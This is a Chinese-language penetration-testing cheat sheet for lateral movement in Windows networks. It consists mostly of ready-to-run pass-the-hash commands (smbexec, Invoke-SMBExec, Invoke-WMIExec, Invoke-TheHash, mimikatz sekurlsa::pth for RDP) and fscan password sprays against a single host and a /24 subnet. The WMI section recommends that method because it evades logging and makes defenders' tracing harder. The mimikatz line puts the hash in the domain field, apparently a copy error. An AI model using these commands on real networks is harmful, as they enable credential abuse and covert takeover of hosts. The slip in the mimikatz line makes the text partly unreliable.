smb
介绍
SMB服务大多运行在windows系统上,SMB通信协议协议在网络上的端点之间提供对文件、打印机和串行端口的共享访问。在扫描过程中,我们通常会看到目标上的 445 TCP 端口打开,为 SMB 协议保留。Microsoft SMB 协议是传输层协议最常使用的是基于 TCP/IP (NBT) 的 NetBIOS,正因为如此,它依赖于较低级别的传输协议。这就是为什么在扫描过程中,我们很可能会同时看到具有在目标上运行的开放端口的协议。
使用 SMB 协议,应用程序(或应用程序的用户)可以访问远程服务器上的文件,以及打印机等其他资源。 因此,客户端应用程序可以读取、创建和更新文件远程服务器。 它还可以与任何设置为接收 SMB 客户端的服务器程序通信要求。
网络上启用 SMB 的存储称为共享。 任何拥有服务器的地址和正确的凭据。 与许多其他文件访问协议一样,SMB 需要一些安全层在网络拓扑中正常运行。 如果 SMB 允许客户端创建、编辑、
检索和删除共享上的文件,显然需要一种身份验证机制。 在用户层面,SMB 客户端需要提供用户名/密码组合才能查看内容或与内容交互SMB共享。
如果扫描得到目标IP的TCP445开放,为了成功枚举远程系统上的共享内容,我们可以使用一个名为smb客户端。
单IP
smbexec_hash传递
1
| .\smbexec.exe -hashes :973fcd01b987e913cc0209c2f462a751 ./administrator@192.168.1.8
|
![image.png](https://cdn.nlark.com/yuque/0/2022/png/2118454/1654062783250-d35fada8-94fe-4ec2-8004-665f809dc04f.png#clientId=u939ddc04-5594-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=692&id=u09f28a6a&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1038&originWidth=1724&originalType=binary&ratio=1&rotation=0&showTitle=false&size=128014&status=done&style=none&taskId=udffff2c3-7bde-47c4-a27f-e473f937928&title=&width=1149.3333333333333)
SMBExec_hash探测
1
| Invoke-SMBExec -Target 192.168.1.8 -Domain DESKTOP-QD1A1VJ -Username administrator -Hash 973fcd01b987e913cc0209c2f462a751
|
![image.png](https://cdn.nlark.com/yuque/0/2022/png/2118454/1654066837915-33437c7d-ef61-4e52-97f3-ae823c4cbbd5.png#clientId=u939ddc04-5594-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=55&id=ua98328a9&margin=%5Bobject%20Object%5D&name=image.png&originHeight=82&originWidth=1618&originalType=binary&ratio=1&rotation=0&showTitle=false&size=24562&status=done&style=none&taskId=uc35fe1c4-3465-4def-88eb-7f95b16d7c6&title=&width=1078.6666666666667)
网段
fscan_SMB探测
1
| .\fs.exe -h 192.168.1.0/24 -m smb -pwd asd123=
|
![image.png](https://cdn.nlark.com/yuque/0/2022/png/2118454/1654066674718-5375ef86-6171-41e6-adca-2f78f3fca855.png#clientId=u939ddc04-5594-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=454&id=ua6ea3a2d&margin=%5Bobject%20Object%5D&name=image.png&originHeight=681&originWidth=1101&originalType=binary&ratio=1&rotation=0&showTitle=false&size=76007&status=done&style=none&taskId=u6135a004-50ae-43aa-a3b5-7564d19f4cc&title=&width=734)
Ps1_hash传递
1
| Invoke-TheHash -Type WMIExec -Target 192.168.1.0/24 -Domain DESKTOP-QD1A1VJ -Username administrator -Hash 973fcd01b987e913cc0209c2f462a751
|
![image.png](https://cdn.nlark.com/yuque/0/2022/png/2118454/1654066475361-5ddea932-19ca-4944-a7d6-8dc0cb3bf9e5.png#clientId=u939ddc04-5594-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=63&id=ub3b799d5&margin=%5Bobject%20Object%5D&name=image.png&originHeight=94&originWidth=1601&originalType=binary&ratio=1&rotation=0&showTitle=false&size=30162&status=done&style=none&taskId=uc4b7af49-776d-4240-9744-f1710c5e47f&title=&width=1067.3333333333333)
RDP
介绍
远程桌面协议(RDP)是一个多通道(multi-channel)的协议,让使用者(所在计算机称为用户端或’本地计算机’)连上提供微软终端机服务的计算机(称为服务端或’远程计算机’)。
单IP
mimikatz_hash传递
1
| sekurlsa::pth /user:Administrator /domain:973fcd01b987e913cc0209c2f462a751 /ntlm:973fcd01b987e913cc0209c2f462a751 "/run:mstsc.exe /restrictedadmin"
|
![image.png](https://cdn.nlark.com/yuque/0/2022/png/2118454/1654063612363-03fa4c1f-0bf8-434f-8d21-4d324ece3229.png#clientId=u939ddc04-5594-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=480&id=wGxXK&margin=%5Bobject%20Object%5D&name=image.png&originHeight=720&originWidth=1440&originalType=binary&ratio=1&rotation=0&showTitle=false&size=71054&status=done&style=none&taskId=u696f65af-cee5-4750-b7fa-13a0039a1c4&title=&width=960)
网段
fscan_扫描
1
| .\fs.exe -h 192.168.1.0/24 -m rdp -pwd asd123=
|
![image.png](https://cdn.nlark.com/yuque/0/2022/png/2118454/1654066642326-95000608-5535-45e9-bbfc-839e1f0daca2.png#clientId=u939ddc04-5594-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=497&id=uac555c22&margin=%5Bobject%20Object%5D&name=image.png&originHeight=746&originWidth=1083&originalType=binary&ratio=1&rotation=0&showTitle=false&size=85491&status=done&style=none&taskId=uf5f2f1a4-57e5-4001-93cb-8e9683a2bdf&title=&width=722)
WMI
介绍
WMI的全名为”Windows Management Instrumentation”。从win8后,Windows操作系统都支持WMI,WMI可以在本地或者远程管理计算机系统。
自从PsExec在内网中被严格监控后,越来越多的反病毒厂商将PsExec加入了黑名单,于是乎攻击者转向使用WMI进行横向移动。在渗透时发现,在使用wmiexec进行横向移动时,Windows操作系统默认不会将WMI的操作记录在日志中。因为这个过程不会记录日志,所以对蓝队来说大大增加了溯源的成本。对攻击者来说,被发现的可能性降低,隐蔽性提高。很多APT组织现在都喜欢使用WMI进行攻击。
单IP
WMIExec_hash传递
1
| Invoke-WMIExec -Target 192.168.1.8 -Domain DESKTOP-QD1A1VJ -Username administrator -Hash 973fcd01b987e913cc0209c2f462a751
|
![image.png](https://cdn.nlark.com/yuque/0/2022/png/2118454/1654066895951-c8da0db7-1b91-4f33-89e3-4fc7b086dfb4.png#clientId=u939ddc04-5594-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=51&id=ub9b3abc8&margin=%5Bobject%20Object%5D&name=image.png&originHeight=77&originWidth=1595&originalType=binary&ratio=1&rotation=0&showTitle=false&size=22139&status=done&style=none&taskId=uee3ff694-cdd1-45f5-9577-b21e4592706&title=&width=1063.3333333333333)
网段
Ps1_hash传递
1
| Invoke-TheHash -Type WMIExec -Target 192.168.1.0/24 -Domain DESKTOP-QD1A1VJ -Username administrator -Hash 973fcd01b987e913cc0209c2f462a751
|
![image.png](https://cdn.nlark.com/yuque/0/2022/png/2118454/1654066316709-eecd7305-9629-4222-9d7d-6625f0e4e047.png#clientId=u939ddc04-5594-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=69&id=ue4619d3a&margin=%5Bobject%20Object%5D&name=image.png&originHeight=103&originWidth=1600&originalType=binary&ratio=1&rotation=0&showTitle=false&size=30387&status=done&style=none&taskId=u77ff4673-564f-4458-bc6e-df773ce0a5c&title=&width=1066.6666666666667)
超级弱口令检查工具 SMB/RDP
![image.png](https://cdn.nlark.com/yuque/0/2022/png/2118454/1654067044438-186b5985-b19a-40a2-bc65-c295c145f39c.png#clientId=u939ddc04-5594-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=701&id=u7a89aa82&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1052&originWidth=1312&originalType=binary&ratio=1&rotation=0&showTitle=false&size=206076&status=done&style=none&taskId=ubf7b89bb-8301-4e59-a6ea-77faab429f9&title=&width=874.6666666666666)
工具
https://github.com/Kevin-Robertson/Invoke-TheHash
https://github.com/shadow1ng/fscan
https://github.com/SecureAuthCorp/impacket
https://github.com/shack2/SNETCracker
https://github.com/gentilkiwi/mimikatz